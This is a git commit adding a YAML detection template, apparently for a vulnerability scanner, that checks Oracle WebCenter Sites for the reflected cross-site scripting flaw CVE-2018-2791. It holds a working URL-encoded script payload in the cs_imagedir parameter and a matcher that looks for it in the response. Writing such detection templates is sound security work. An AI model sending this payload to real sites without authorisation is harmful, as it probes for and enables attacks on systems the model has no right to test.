Create Oracle WebCenter Sites XSS.yaml

2020-04-08 17:07:09 +05:30 · 2020-04-08 17:07:09 +05:30 · f6661aa84c
parent 15000e1738
commit f6661aa84c
1 changed files with 16 additions and 0 deletions
--- a/cves/Oracle
+++ b/cves/Oracle
@ -0,0 +1,16 @@
+id: CVE-2018-2791
+
+info:
+  name: Oracle WebCenter Sites XSS
+  author: Ice3man
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
+    matchers:
+      - type: word
+        words:
+          - "1337"
+        part: body